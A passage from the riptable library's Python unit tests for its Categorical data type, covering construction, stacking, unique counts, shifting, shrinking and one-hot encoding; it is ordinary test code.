isinstance(c.category_array, FastArray) assert c.base_index == 1 def test_from_pandas_object(self): pdc = pd.Categorical(['a', 'b', 'c']) c = Categorical(pdc, unicode=True) assert c.category_array.dtype.char == 'U' c = Categorical(pdc, unicode=False) assert c.category_array.dtype.char == 'S' pdc = pd.Categorical(three_unicode) c = Categorical(pdc) assert c.category_array.dtype.char == 'U' def test_empty_init(self): with pytest.raises(ValueError): c = Categorical({}) with pytest.raises(ValueError): c = Categorical([]) def test_multi_with_cats(self): with pytest.raises(NotImplementedError): c = Categorical( [FastArray(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])], [FastArray(['a', 'b', 'c']), FastArray([1, 2, 3])], ) # 5/9/2019 removed this warning to reduce constructor paths # def test_unicode_warn(self): # with self.assertWarns(UserWarning): # c = Categorical([1,2,3],{1:'a',2:'b',3:'c'}, unicode=False) def test_map_non_integer(self): with pytest.raises(TypeError): c = Categorical([1.0, 2.0, 3.0], {1: 'a', 2: 'b', 3: 'c'}) def test_category_multi_arrays(self): with pytest.raises(TypeError): c = Categorical([1, 2, 3], [np.arange(5), np.arange(5)]) def test_getitem_enum_list2(self): c = Categorical([1, 1, 2, 3, 1], {'a': 1, 'b': 2, 'c': 3}) d = c[[1, 2, 3]] assert d[0] == 'a' def test_tuple_compare_error(self): c = Categorical([FastArray(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])]) with pytest.raises(ValueError): _ = c == ('a', 'b', 'c') def test_filter_out_bytes_from_unicode(self): c = Categorical(['a', 'a', 'b', 'c', 'a'], unicode=True, invalid=b'a') assert bool(np.all(c._fa == [1, 1, 2, 3, 1])) assert c.category_array.dtype.char == 'U' assert 'a' in c.category_array def test_bytes_compare_multikey(self): c = Categorical([np.array(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])], unicode=True) cols = c.category_dict bytescol = list(cols.values())[0] assert bytescol.dtype.char == 'U' result = c == (b'a', 1) assert bool(np.all(FastArray([True, False, False, True]) == result)) def test_cat_zero_wronge_base(self): with pytest.raises(ValueError): c = CatZero(['a', 'a', 'b', 'c', 'a'], base_index=1) def test_preserve_name(self): ds = TypeRegister.Dataset({'strcol': np.random.choice(['a', 'b', 'c'], 10), 'numcol': arange(10)}) c = Categorical(ds.strcol) assert c.get_name() == 'strcol' c = Categorical([ds.strcol, ds.numcol]) ds2 = c.sum(arange(10)) labels = ds2.label_get_names() assert labels[0] == 'strcol' assert labels[1] == 'numcol' ds = TypeRegister.Dataset({'mycodes': np.random.randint(1, 4, 10)}) c = Categorical(ds.mycodes, {'a': 1, 'b': 2, 'c': 3}) assert c.get_name() == 'mycodes' codes = np.random.randint(1, 4, 10) cats = FastArray(['a', 'b', 'c']) cats.set_name('test') c = Categorical(codes, cats) assert c.get_name(), 'test' def test_subarray_name(self): c = Categorical(['a', 'b']) c1 = c[[0]] assert c1.get_name() == c.get_name() # Make sure there is no "quantum effect" that printing the array changes it's name. _ = str(c1) assert c1.get_name() == c.get_name() def test_construct_from_categorical(self): c = Categorical(['a', 'a', 'b', 'c', 'a']) d = Categorical(c) assert isinstance(d.category_array, np.ndarray) assert isinstance(d.expand_array, np.ndarray) d2 = Categorical([c]) assert isinstance(d2.category_array, np.ndarray) assert isinstance(d2.expand_array, np.ndarray) def test_total_size(self): c = Categorical(['a', 'a', 'b', 'c', 'a']) assert c._total_size == 8 c = Categorical([arange(5, dtype=np.int32), arange(5, dtype=np.int32)]) assert c._total_size == 45 c = Categorical([arange(5, dtype=np.int64), arange(5, dtype=np.int64)]) assert c._total_size == 85 # removed while modifying groupby calculation behavior # def test_hold_dataset(self): # ds = TypeRegister.Dataset({'strcol':np.random.choice(['a','b','c'],30), 'numcol':arange(30)}) # c = ds.cat('strcol') # self.assertTrue(isinstance(c._dataset, TypeRegister.Dataset)) # result = c.sum() # self.assertTrue(isinstance(result, TypeRegister.Dataset)) # self.assertEqual(result._nrows, 3) def test_expand_dict(self): og_strings = FastArray(['a', 'a', 'b', 'c', 'a']) og_nums = arange(5) c = Categorical([og_strings, og_nums]) d = c.expand_dict assert isinstance(d, dict) assert len(d) == 2 dictlist = list(d.values()) assert bool(np.all(dictlist[0] == og_strings)) assert bool(np.all(dictlist[1] == og_nums)) c = Categorical([1, 2, 3], {'a': 1, 'b': 2, 'c': 3}) d = c.expand_dict assert isinstance(d, dict) assert len(d) == 1 dictlist = list(d.values()) assert bool(np.all(dictlist[0] == arange(1, 4))) c = Categorical(np.random.randint(0, 10, 100_100)) with pytest.warns(UserWarning): d = c.expand_dict def test_expand_array(self): c = Categorical([1, 2, 3], {'a': 1, 'b': 2, 'c': 3}) arr = c.expand_array assert bool(np.all(arr == arange(1, 4))) c = Categorical([FastArray(['a', 'b', 'c', 'a']), FastArray([1, 2, 3, 1])]) # expand array now works on multikey categoricals, returns a tuple of expanded arrays SJK: 4/29/2019 multi_expand = c.expand_array assert isinstance(multi_expand, tuple) assert len(multi_expand) == 2 assert bool(np.all(FastArray(['a', 'b', 'c', 'a']) == multi_expand[0])) assert bool(np.all(FastArray([1, 2, 3, 1]) == multi_expand[1])) c._fa[:] = 0 multi_expand = c.expand_array assert bool(np.all(isnan(multi_expand[1]))) assert bool(np.all(multi_expand[0] == b'Filtered')) def test_true_false_spacer(self): c = Categorical(['a', 'b', 'c']) t_true = c._tf_spacer(['test', True]) assert t_true == 'testTrue ' t_false = c._tf_spacer(['test', False]) assert t_false == 'testFalse' def test_mapping_hstack(self): c1 = Categorical([1, 1, 1, 1, 2, 3], {'a': 1, 'b': 2, 'c': 3}) c2 = Categorical([1, 1, 1, 1, 3, 4], {'a': 1, 'c': 3, 'd': 4}) stacked = Categorical.hstack([c1, c2]) assert stacked.unique_count == 4 assert stacked.from_category('b') == 2 assert stacked.from_category('d') == 4 assert len(stacked) == 12 c1 = Categorical([1, 1, 1, 1, 2, 3], {'a': 1, 'b': 2, 'd': 3}) c2 = Categorical([1, 1, 1, 1, 3, 4], {'a': 1, 'c': 3, 'd': 4}) # removed, hstack now relies on unique codes only SJK: 3/5/2019 # with self.assertRaises(TypeError): # c3 = Categorical.hstack([c1, c2]) def test_matlab_nan(self): dts = [np.int8, np.int16, np.int32, np.int64] matlab_float_idx = FastArray([1.0, 0.0, np.nan]) matlab_cats = ['a', 'b'] for dt in dts: c = Categorical(matlab_float_idx, matlab_cats, dtype=dt, from_matlab=True) assert bool(np.all(c._fa == [1, 0, 0])), f'failed to flip nan to zero for dtype {dt}' assert np.dtype(dt) == c.dtype def test_from_provided_with_filter(self): # not found and filter c = Categorical( ['a', 'a', 'b', 'c', 'd'], ['a', 'b', 'c'], filter=FastArray([False, False, True, True, False]), invalid='INVALID', ) c.filtered_set_name('INVALID') correct = FastArray([b'INVALID', b'INVALID', b'b', b'c', b'INVALID']) assert bool(np.all(c.expand_array == correct)) # filter only (uses default invalid) c = Categorical(['a', 'a', 'b', 'c'], ['a', 'b', 'c'], filter=FastArray([False, False, True, True]),) f = c.filtered_name correct = FastArray([f, f, b'b', b'c']) assert bool(np.all(c.expand_array == correct)) # even though filtered out, categories still untouched correct = FastArray([b'a', b'b', b'c']) assert bool(np.all(c.category_array == correct)) # filtering not allowed for base index 0 with pytest.raises(ValueError): c = Categorical( ['a', 'a', 'b', 'c'], ['a', 'b', 'c'], filter=FastArray([False, False, True, True]), base_index=0, ) def test_numeric_invalid(self): # 5/16/2019 invalid category must be in provided uniques c = Categorical([1.0, 1.0, 2.0], [1.0, 2.0], invalid=2.0) assert c._fa[2] == 2 num = c.sum(arange(1, 4)).col_0[0] assert num == 3 def test_get_groupings(self): g, f, n = ( FastArray([2, 3, 0, 4, 1]), FastArray([0, 0, 2, 4]), FastArray([0, 2, 2, 1]), ) c = Categorical(['b', 'c', 'a', 'a', 'b'], base_index=0) gg = c.get_groupings() group = gg['iGroup'] first = gg['iFirstGroup'] ncount = gg['nCountGroup'] assert bool(np.all(g == group)) assert bool(np.all(f == first)) assert bool(np.all(n == ncount)) c = Categorical(['b', 'c', 'a', 'a', 'b'], base_index=1) gg = c.get_groupings() group = gg['iGroup'] first = gg['iFirstGroup'] ncount = gg['nCountGroup'] assert bool(np.all(g == group)) assert bool(np.all(f == first)) assert bool(np.all(n == ncount)) def test_repr(self): # just make sure no error for coverage c = Categorical(['a', 'b', 'c']) r = c.__repr__() assert r, f"Representation should not be empty for Categorical '{c}'." assert isinstance(r, str) def test_copy_deep(self): c = Categorical(['a', 'b', 'c']) d = c.copy(deep=True) d[0] = 'b' assert c[0] == 'a' assert c._fa[0] == 1 assert d[0] == 'b' assert d._fa[0] == 2 def test_copy_new_filter(self): a = Categorical('A B A B A B'.split()) b = Categorical('B A B A B A'.split()) c = a.copy() f = c == 'A' c[f] = b[f] assert c[0] == 'B' assert c[1] == 'B' assert a[0] == 'A' assert a[1] == 'B' assert b[0] == 'B' assert b[1] == 'A' def test_setitem_tuple(self): c = Categorical([arange(5), arange(5)]) c[0] = (1, 1) assert c._fa[0] == 2 def test_nunique(self): codes = np.random.randint(0, 3, 1000) d = {0: 'All', 1: 'ManualAndQuasi', 2: 'Manual'} c = Categorical(codes, d) n = c.nunique() assert n == 3 assert len(c.unique()) == 3 codes = np.ones(1000, dtype=np.int32) c = Categorical(codes, d) n = c.nunique() assert n == 1 assert len(c.unique()) == 1 codes = arange(5) c = Categorical(codes, d) n = c.nunique() assert n == 5 assert len(c.unique()) == 5 c = Categorical(['a', 'a', 'b', 'c', 'd'], ['a', 'b', 'c', 'd']) n = c.nunique() assert n == 4 assert len(c.unique()) == 4 c = Categorical(['a', 'a', 'b', 'c', 'd'], ['a', 'b', 'c', 'd'], base_index=0) n = c.nunique() assert n == 4 assert len(c.unique()) == 4 c = Categorical(['a', 'a', 'b', 'c', 'd']) c[2] = 0 n = c.nunique() assert n == 3 assert len(c.unique()) == 3 assert c.unique_count == 4 c = Categorical([arange(3), np.array(['a', 'b', 'c'])]) c[0] = 0 n = c.nunique() assert n == 2 assert c.unique_count == 3 # The following assertion is moved to it's own unit pytest along with an xfail. # found below and named test_multikey_categorical_unique. # assert len(c.unique()) == 2 def test_unique(self): l = list('xyyz') c, c_sub = rt.Cat(l), rt.Cat(l[:3]) assert_array_equal(c.unique(), c.category_array, 'mismatch between unique categories and category array') assert_array_equal(c.unique(), c.category_array.unique(), 'mismatch between unique categories and expanded category array') assert c.nunique() == 3, 'mismatch in number of unique categories' assert_array_equal(c[:3].unique(), c_sub.category_array, 'mismatch between unique categories and category array with sliced categorical') assert_array_equal(c[:3].unique(), c_sub.category_array.unique(), 'mismatch between unique categories and expanded category array with sliced categorical') assert c[:3].nunique() == 2, 'mismatch in number of unique categories with sliced categorical' def test_scalar_unique(self): idx = ones(100) cats = 700_000.0 c = Categorical(idx, cats, from_matlab=True) assert isinstance(c, Categorical) assert c.unique_count == 1 def test_stack_multikey(self): # TODO pytest parameterize the strings strs = FA(np.random.choice(['aaaaa', 'b', 'ccc'], 23)) flts = np.random.choice([7.14, 6.66, 5.03], 23) c1 = Categorical([strs, flts]) c1_str = Categorical(strs) c1_flt = Categorical(flts) strs2 = FA(np.random.choice(['b', 'aaaaa'], 17)) flts2 = np.random.choice([5.03, 7.14], 17) c2 = Categorical([strs2, flts2]) c2_str = Categorical(strs2) c2_flt = Categorical(flts2) fa_str = hstack([strs, strs2]) fa_flt = hstack([flts, flts2]) # TODO add assertions for multikey Categoricals c_str = Categorical(fa_str) c_flt = Categorical(fa_flt) # TODO move these into SDS save / load tests paths = [r'riptable/tests/temp/ds1.sds', r'riptable/tests/temp/ds2.sds'] ds1 = Dataset( { 'mkcat': c1, 'strcat': c1_str, 'fltcat': c1_flt, 'strfa': strs, 'fltfa': flts, } ) ds2 = Dataset( { 'mkcat': c2, 'strcat': c2_str, 'fltcat': c2_flt, 'strfa': strs2, 'fltfa': flts2, } ) ds1.save(paths[0]) ds2.save(paths[1]) # normal dataset hstack hstack_ds = hstack([ds1, ds2]) assert isinstance(hstack_ds, Dataset) # dataset hstack from load stack_load_ds = load_sds(paths, stack=True) assert isinstance(stack_load_ds, PDataset) # multikey cat hstack hstack_mkcats = hstack([c1, c2]) assert isinstance(hstack_mkcats, Categorical) # normal array hstack hstack_strs = hstack([strs, strs2]) hstack_flts = hstack([flts, flts2]) # single cat hstack hstack_cstrs = hstack([c1_str, c2_str]) assert isinstance(hstack_cstrs, Categorical) hstack_cflts = hstack([c1_flt, c2_flt]) assert isinstance(hstack_cflts, Categorical) assert bool(np.all(hstack_strs == hstack_cstrs.expand_array)) assert bool(np.all(hstack_flts == hstack_cflts.expand_array)) mktup = [*hstack_mkcats.category_dict.values()] assert bool(np.all(hstack_mkcats._expand_array(mktup[0]) == fa_str)) assert bool(np.all(hstack_mkcats._expand_array(mktup[1]) == fa_flt)) mktup2 = [*stack_load_ds.mkcat.category_dict.values()] assert bool(np.all(stack_load_ds.mkcat._expand_array(mktup2[0]) == fa_str)) assert bool(np.all(stack_load_ds.mkcat._expand_array(mktup2[1]) == fa_flt)) mktup3 = [*hstack_ds.mkcat.category_dict.values()] assert bool(np.all(hstack_ds.mkcat._expand_array(mktup3[0]) == fa_str)) assert bool(np.all(hstack_ds.mkcat._expand_array(mktup3[1]) == fa_flt)) for p in paths: os.remove(p) # TO TEST: # regular python Enum # apply / apply_dataset, etc. # def test_sort_copy(self): # c = Categorical(np.random.choice(['a','b','c'], 15)) # d = c.sort_copy() # c = Categorical([np.random.choice(['a','b','c'], 15), np.random.randint(0,3,15)]) # d = c.sort_copy() # ---------------------------------------------------------- # def test_str_repr(self): # ''' # SJK: We're still in the early stages of deciding how to print out or summarize a categorical in the workspace. # Comment it out if repr or str changes, and I will fix up. # ''' # # no break # input = ['b', 'b', 'b', 'a', 'b', 'b'] # str_string = ', '.join(input) # repr_string = "Categorical(["+str_string+"])" # c = Categorical(input) # self.assertEqual(str(c),str_string, msg=f"__str__ did not produce the correct string {str_string} for categorical. got {str_string} instead") # self.assertEqual(c.__repr__(),repr_string, msg=f"__repr__ did not produce the correct string {str_string} for categorical. got {str_string} instead") # # add break # slice_size = 5 # input = ['b', 'b', 'b', 'a', 'b', 'b', 'b', 'b', 'b', 'a', 'b', 'b', 'c', 'c'] # str_string = ', '.join(input[:slice_size]+['...']+input[-slice_size:]) # repr_string = "Categorical(["+str_string+"])" # c = Categorical(input) # self.assertEqual(str(c),str_string, msg=f"__str__ did not produce the correct string {str_string} for categorical. got {str_string} instead") # self.assertEqual(c.__repr__(),repr_string, msg=f"__repr__ did not produce the correct string {str_string} for categorical. got {str_string} instead") def test_as_string_array(self): # SJK 10/4/2018 - as string array now returns bytes OR unicode (whatever type the string based categorical is holding) f = np.array([b'b', b'b', b'b', b'a', b'b', b'b']) c = Categorical(f) is_equal = bool(np.all(c.as_string_array == f)) assert isinstance(c.as_string_array, FastArray), f"Categorical did not return a fastarray in as_string_array" assert ( is_equal ), f"Categorical returned an incorrect string array {c.as_string_array} view of itself. Expected {f}" def test_indexing_numeric(self): c = Cat([1.1, 2.2, 3.3]) result = c['2.2'] assert np.all(result == [False, True, False]) def test_fill_forward(self): fa = FA([1., np.nan, 1.]) c = Cat([1,1,1]) c.fill_forward(fa, inplace=True) assert np.all(fa == [1., 1., 1.]) # TODO pytest parameterize `compare_func_names` def test_all_compare_tests(self): # with scalar # cat(unicode) i = 2 c1 = Categorical(three_ints) if ShowCompareInfo: print("Categorical:", c1) if ShowCompareInfo: print("Compare unicode to int scalar: 2") self.compare_cat_test(c1, compare_func_names, int_success, i) # cat(unicode) / unicode, unicode list i = "AMZN\u2082" c3 = Categorical(three_unicode) if ShowCompareInfo: print("Categorical:", c3) if ShowCompareInfo: print("Compare unicode cat to unicode string") self.compare_cat_test(c3, compare_func_names, int_success, i) if ShowCompareInfo: print("Compare to list of unicode string") self.compare_cat_test(c3, compare_func_names, int_success, [i]) if ShowCompareInfo: print("Compare to a numpy array of unicode string") self.compare_cat_test(c3, compare_func_names, int_success, np.array([i])) # cat(bytes) / bytes, bytes list i = b'b' c4 = Categorical(three_bytes) if ShowCompareInfo: print("Categorical:", c4) if ShowCompareInfo: print("Compare bytes cat to bytestring") self.compare_cat_test(c4, compare_func_names, int_success, i) if ShowCompareInfo: print("Compare to bytestring in list") self.compare_cat_test(c4, compare_func_names, int_success, [i]) if ShowCompareInfo: print("Compare to bytestring in numpy array") self.compare_cat_test(c4, compare_func_names, int_success, np.array([i])) # cat(bytes) / unicode, unicode list i = "b" c5 = Categorical(three_bytes) if ShowCompareInfo: print("Categorical:", c5) if ShowCompareInfo: print("Compare bytes cat to unicode string") self.compare_cat_test(c5, compare_func_names, int_success, i) if ShowCompareInfo: print("Compare to unicode string in list") self.compare_cat_test(c5, compare_func_names, int_success, [i]) if ShowCompareInfo: print("Compare to unicode string in numpy array") self.compare_cat_test(c5, compare_func_names, int_success, np.array([i])) # equal categoricals (same dictionary) # cat(bytes) / cat(bytes) if ShowCompareInfo: print("Compare two equal categoricals:") if ShowCompareInfo: print("Both from byte lists:") c1 = Categorical(three_bytes) c2 = Categorical(three_bytes) if ShowCompareInfo: print("cat1:", c1) if ShowCompareInfo: print("cat2:", c2) self.compare_cat_test(c1, compare_func_names, same_success, c2) # cat(unicode) / cat(unicode) if ShowCompareInfo: print("Both from unicode lists:") c1 = Categorical(three_unicode) c2 = Categorical(three_unicode) if ShowCompareInfo: print("cat1:", c1) if ShowCompareInfo: print("cat2:", c2) self.compare_cat_test(c1, compare_func_names, same_success, c2) # cat(unicode) / cat(bytes) if ShowCompareInfo: print("unicode/bytes list") c1 = Categorical(["a", "b", "c"]) c2 = Categorical(three_bytes) if ShowCompareInfo: print("cat1:", c1) if ShowCompareInfo: print("cat2:", c2) self.compare_cat_test(c1, compare_func_names, same_success, c2) # unequal categoricals (same dictionary) # cat(bytes) / cat(bytes) if ShowCompareInfo: print("Compare two unequal categoricals (same dict):") if ShowCompareInfo: print("both bytes") c1 = Categorical([0, 1, 0], three_bytes) c2 = Categorical([2, 1, 2], three_bytes) if ShowCompareInfo: print("cat1:", c1) if ShowCompareInfo: print("cat2:", c2) self.compare_cat_test(c1, compare_func_names, diff_success, c2) # cat(unicode) / cat(unicode) if ShowCompareInfo: print("both unicode") c1 = Categorical([0, 1, 0], three_unicode) c2 = Categorical([2, 1, 2], three_unicode) if ShowCompareInfo: print("cat1:", c1) if ShowCompareInfo: print("cat2:", c2) self.compare_cat_test(c1, compare_func_names, diff_success, c2) ## cat(bytes) / int list (matching) # if ShowCompareInfo: print("Compare categorical to matching int list") # if ShowCompareInfo: print("bytes") # i = [1,2,3] # c1 = Categorical(three_bytes) # self.compare_cat_test(c1,compare_func_names,same_success,i) ## cat(unicode) / int list (matching) # if ShowCompareInfo: print("unicode") # c1 = Categorical(three_unicode) # self.compare_cat_test(c1,compare_func_names,same_success,i) ## cat(bytes) / int list (non-matching) # if ShowCompareInfo: print("Compare categorical to non-matching int list") # if ShowCompareInfo: print("bytes") # i = [3,2,1] # c1 = Categorical(three_bytes) # self.compare_cat_test(c1,compare_func_names,int_success,i) ## cat(unicode) / int list(non-matching) # if ShowCompareInfo: print("unicode") # c1 = Categorical(three_unicode) # self.compare_cat_test(c1,compare_func_names,int_success,i) # def cat_slicing(self): # three_unicode =FA(["AAPL\u2080","AMZN\u2082","IBM\u2081"]) # three_bytes = FA([b'a',b'b',b'c']) # num_rows=8 # idx_size=15 # get_item_dicts = { # "single_slices" : { # ":2" : slice(None,2,None), # "-2:": slice(-2,None,None), # "2:5": slice(2,5,None), # "5:" : slice(5,None,None), # ":" : slice(None,None,None) # }, # "bool_arrays" : { # "python_bool" : [True, False, True, False, False, True, True, True, False, True, False, False, True, False, True], # "numpy_bool" : np.array([True, False, True, False, False, True, True, True, False, True, False, False, True, False, True]) # }, # "int_indices" : { "int_idx_size"+str(idx_size) : np.random.randint(low=0,high=num_rows,size=idx_size) for idx_size in range(1,num_rows) } # } # failures = 0 # idx_list = np.random.randint(low=0,high=8,size=15) # s_list = np.array([b'adam',b'bob',b'charlie',b'david',b'edward',b'frank',b'greg',b'harold']) # c = Categorical(idx_list, s_list) # for key, test_dict in get_item_dicts.items(): # print("\n\n"+key) # for call_str, val in test_dict.items(): # success = s_list[idx_list[val]] # if np.all(c[val].as_string_array == success): # message = "success" # else: # message = "failure" # failures += 1 # print(call_str, message) # print("Tests complete with",failures,"errors") # return c @pytest.mark.xfail( reason="RIP-215 - lead to inconsistent Categorical state; please add hypothesis tests when resolved." ) def test_category_add(self): cat = Categorical(list("bbcdebc")) e = "a" cat.category_add(e) assert e in cat, "expect the added category to be added to the Categorical" assert e in cat._categories, "expect the added category to be added to the Categorical._categories" assert e in cat.category_array, "expect the added category to be added to the Categorical.category_array" assert e in cat.category_dict, "expect the added category to be added to the Categorical.category_dict" @pytest.mark.xfail( reason="RIP-215 - lead to inconsistent Categorical state; please add hypothesis tests when resolved." ) def test_category_remove(self): cat = Categorical(list("bbcdebc")) e = cat[0] cat.category_remove(e) assert e not in cat, "expect the removed category to be removed from the Categorical" assert e not in cat._categories, "expect the removed category to be removed from the Categorical._categories" assert ( e not in cat.category_array ), "expect the removed category to be removed from the Categorical.category_array" assert ( e not in cat.category_dict ), "expect the removed category to be removed from the Categorical.category_dict" # TODO move this to testing utils def compare_cat_test(self, cat, compare_func_names, success_bools, i): for fname, success in zip(compare_func_names, success_bools): func = getattr(cat, fname) result = func(i) assert np.all(result == success), f'fail on {fname} {cat} {i}' if ShowCompareInfo: if np.all(result == success): message = "succeeded" else: message = "failed" print(fname, message) def test_duplicated(self): result = Cat([2, 3, 2], list('qwery')).duplicated() assert np.all(result == FA([False, False, True])) def test_cat_copy(self): # add deep copy for enum, single, multi x = arange(6, dtype=uint16) // 2 c = Cat(x, {0: 'Run', 1: 'Stop', 2: 'Start'}, dtype=uint16) c[1] = 'Start' a = c.copy() d = a[:5] a[1] = 'Run' b = a[:5] assert a._fa[1] == 0 assert b._fa[1] == 0 assert c._fa[1] == 2 assert d._fa[1] == 0 def test_assinglekey(self): c = Cat([1, 2, 1, 2, 1, 2], {'Sunny': 1, 'Thunderstorms': 2}) # insert bad value c._fa[3] = 17 c1 = c.as_singlekey(ordered=False) c2 = c.as_singlekey(ordered=True) assert np.all(c1.expand_array == c2.expand_array) c = Cat([-1, -2, -1, -2, -1, -2], {'Sunny': -1, 'Thunderstorms': -2}) c._fa[3] = 17 c3 = c.as_singlekey(ordered=False) c2 = c.as_singlekey(ordered=True) assert np.all(c1.expand_array == c2.expand_array) assert np.all(c3.expand_array == c2.expand_array) # Cannot use the pytest.mark.parameterize decorator within classes that inherit from unittest.TestCase. # Will need to migrate for unittest to pytest and fold the following categorical tests into Categorical_Test. @pytest.mark.parametrize( "categoricals", [ # Categorical constructed from python list data pytest.param( [ Categorical(data) for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray]) ], id="cat_with_list_values", ), # Categorical constructed from numpy array pytest.param( [ Categorical(np.array(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray]) ], id="cat_with_np_array_values", ), # Categorical constructred from riptable fast array pytest.param( [ Categorical(rt.FastArray(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray, CategoryMode.NumericArray]) ], id="cat_with_rt_fastarray_values", ), # failed test cases pytest.param( [Categorical(data) for data in get_categorical_data_factory_method(CategoryMode.MultiKey)], marks=[ pytest.mark.xfail( reason="RIP-410 - Bug for MultiKey Categoricals: AttributeError: 'Categorical' object has no attribute 'ismultikey_labels'" ) ], id="cat_with_tuple_values", ), ], ) def test_one_hot_encode(categoricals): for categorical in categoricals: col_names, encoded_arrays = categorical.one_hot_encode() category_array = categorical.category_array.astype('U') # Test 1.1 The col_names are the same as the category array. assert not set(category_array).symmetric_difference(set(col_names)), ( f"The column names should be the same as the names in the category array", f"category array {category_array}\ncolumn names {col_names}", ) # Test 1.2 The encoded_arrays dtypes are consistent with one another. encoded_arrays_dtypes = set([fa.dtype for fa in encoded_arrays]) assert ( len(encoded_arrays_dtypes) == 1 ), f"Encoded array dtypes should be consistent, got {encoded_arrays_dtypes}" # todo for each category, assert the mask of the categorical is in the encoded_arrays @pytest.mark.parametrize( "categoricals", [ # Categorical constructed from python list data pytest.param( [Categorical(data) for data in get_categorical_data_factory_method([CategoryMode.StringArray])], id="cat_with_list_values", ), # Categorical constructed from numpy array pytest.param( [Categorical(np.array(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray])], id="cat_with_np_array_values", ), # Categorical constructred from riptable fast array pytest.param( [ Categorical(rt.FastArray(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray]) ], id="cat_with_rt_fastarray_values", ), ], ) def test_shift_cat(categoricals): # todo Handle numeric invalid types for categoricals with values other than strings. filtered_name = rt.rt_enum.FILTERED_LONG_NAME.encode("utf-8") for categorical in categoricals: cat_len = len(categorical) for i in range(-cat_len + 1, cat_len): # exhaustive shift of all Categorical values. # shift the categorical i-places shift_cat = categorical.shift_cat(i) # The category array should remain unchanged. assert_array_equal(shift_cat.category_array, categorical.category_array) # The underlying FastArray should have the items shifted to the i-th position. if i > 0: # shift forwards case assert_array_equal( shift_cat._fa[i:], categorical._fa[:-i], f"FastArray items should be shifted by {i} postions.", ) # The Categorical should have the values shifted to the i-th position. cat_values, shift_cat_values = ( categorical.expand_array, shift_cat.expand_array, ) assert_array_equal( shift_cat_values[i:], cat_values[:-i], f"Categorical values should be shifted by {i} positions.", ) # The underlying FastArray should have the first i-items to be the invalid value. # The Categorical values should have the first i-items be the filtered or invalid name. # Need to handle other invalid values and other Categorical base indexing. assert_array_equal( shift_cat_values[:i], np.full(i, filtered_name), f"Shifted Categorical values up to {i}-th position should be '{filtered_name}'.", ) assert_array_equal( shift_cat._fa[:i], np.zeros(i), f"Shifted Categorical underlying FastArray items up to {i}-th position should be the invalid value 0.", ) elif i < 0: # shifted backwards case i = abs(i) # slicing arithmetic based on positional value of i assert_array_equal( shift_cat._fa[: cat_len - i], categorical._fa[i:], f"FastArray items should be shifted by -{i} postions.", ) cat_values, shift_cat_values = ( categorical.expand_array, shift_cat.expand_array, ) assert_array_equal( shift_cat_values[: cat_len - i], cat_values[i:], f"Categorical values should be shifted by -{i} positions.", ) assert_array_equal( shift_cat_values[-i:], np.full(i, filtered_name), f"Shifted Categorical values up to -{i}-th position should be '{filtered_name}'.", ) assert_array_equal( shift_cat._fa[-i:], np.zeros(i), f"Shifted Categorical underlying FastArray items up to -{i}-th position should be the invalid value 0.", ) elif i == 0: # zero-th shift case # test for equality assert_array_equal(shift_cat.category_array, categorical.category_array) assert_array_equal(shift_cat._fa, categorical._fa) cat_values, shift_cat_values = ( categorical.expand_array, shift_cat.expand_array, ) assert_array_equal(shift_cat_values, cat_values) # shift overflow for backward and forward case up to two values for i in list(range(-cat_len - 2, -cat_len)) + list(range(cat_len, cat_len + 2)): shift_cat = categorical.shift_cat(i) assert_array_equal(shift_cat.category_array, categorical.category_array) # Investigate possible bug with expanding Categorical values. E.g.: # given: # Categorical([a, a, a, a, a, a, a, a, a, a]) Length: 10 # FastArray([1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int8) Base Index: 1 # FastArray([b'a'], dtype='|S1') Unique count: 1 # shifted categorical # Categorical([Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered]) Length: 10 # FastArray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int8) Base Index: 1 # FastArray([b'a'], dtype='|S1') Unique count: 1 # got # E x: FastArray([b'Filtered', b'Filtered', b'Filtered', b'Filtered', # E b'Filtered', b'Filtered', b'Filtered', b'Filtered', # E b'Filtered', b'a'], dtype='|S8') # E y: array([b'Filtered', b'Filtered', b'Filtered', b'Filtered', b'Filtered', # E b'Filtered', b'Filtered', b'Filtered', b'Filtered', b'Filtered'], # E dtype='|S8') # Expected all values to be b'Filtered', but saw b'a'. # todo assert_array_equal(shift_cat_values, np.full(cat_len, filtered_name), f"Overflow shifted Categorical values. All values are expected to be invalid '{filtered_name}'.") assert_array_equal( shift_cat._fa, np.zeros(cat_len), f"Overflow shifted Categorical underlying FastArray items. All values are expected to be invalid value 0.", ) @pytest.mark.parametrize( # TODO - add base 0 and base 1 indexing w/ expectations "categoricals", [ # Categorical constructed from python list data pytest.param( [Categorical(data) for data in get_categorical_data_factory_method([CategoryMode.StringArray])], id="cat_with_list_values", ), # Categorical constructed from numpy array pytest.param( [Categorical(np.array(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray])], id="cat_with_np_array_values", ), # Categorical constructred from riptable fast array pytest.param( [ Categorical(rt.FastArray(data)) for data in get_categorical_data_factory_method([CategoryMode.StringArray]) ], id="cat_with_rt_fastarray_values", ), ], ) @pytest.mark.parametrize("misc", [None, "INVALID"]) # TODO - add numeric values @pytest.mark.parametrize("inplace", [False, True]) def test_shrink(categoricals, misc, inplace): for categorical in categoricals: cat = categorical.copy(deep=True) # deep copy so test data remains unchanged with inplace shrinks # Test 1 Shrink with empty values. # Shrink to empty categories. shrink_cat = cat.shrink([], misc=misc, inplace=inplace) # Type is preserved after shrinking. assert isinstance(shrink_cat, Categorical), "shrink_cat should be a Categorical." if misc is None: # For base index 1 Categorical, the underlying FastArray should be all zeros. assert_array_equal(shrink_cat._fa, np.zeros(len(cat))) # The Categorical categories should be empty. expected_category_array = np.empty(0) assert_array_equal( shrink_cat.category_array, expected_category_array, f"Category dictionary values should be empty.", ) for arr in shrink_cat.category_dict.values(): assert_array_equal( arr, expected_category_array, f"Category dictionary values should be empty.", ) # TODO expanding shrink categorical does not return original types invalid value; instead it returns nans # N.B, when shrinking, the category array type changes to float64 # E x: FastArray([nan]) # E y: array([b'Filtered'], dtype='|S8') # 